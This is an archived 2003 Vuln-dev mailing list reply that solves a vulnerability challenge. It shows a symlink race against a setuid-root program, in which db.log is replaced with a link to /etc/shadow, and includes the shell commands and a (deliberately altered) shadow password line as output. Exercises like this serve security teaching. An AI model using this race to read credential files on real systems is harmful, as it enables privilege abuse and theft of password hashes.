Vulnerability Development mailing list archives

Re: [Vuln-dev Challenge] Challenge #2

From: Thomas Cannon <tcannon () noops org>
Date: Fri, 23 May 2003 16:48:08 -0700


        /* read log */
        if ( (f1 = fopen("db.log", "r")) == NULL)
                return 1;
        if (fgets(bfp, BFSIZE, f1) == NULL)
                return 1;


...and if db.log is perhaps a symlink to /etc/shadow?

I assumed the program would be chown'd to root, and set 4755. If this is an
invalid assumption, well, no point in reading any further.

I compiled the program, stopped it after it writing the input log, made a
symlink, and resumed running the program, with lovely results:

[tcannon@needle]$ rm db.log
[tcannon@needle]$ ln -s /etc/shadow db.log
[tcannon@needle]$ fg
./a.out a a
root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::

I like race conditions. No point in wasting your CPU -- that shadowed
password did get modified before I sent it to the list :-)

Cheers,

--tcannon

PS: Nice strcpy

Current thread:

[Vuln-dev Challenge] Challenge #2 Dave McKinney (May 23)
- Re: [Vuln-dev Challenge] Challenge #2 Thomas Cannon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
  - Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jason_Royes (May 24)
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted) Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
  - Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
  - Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
    - Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)

(Thread continues...)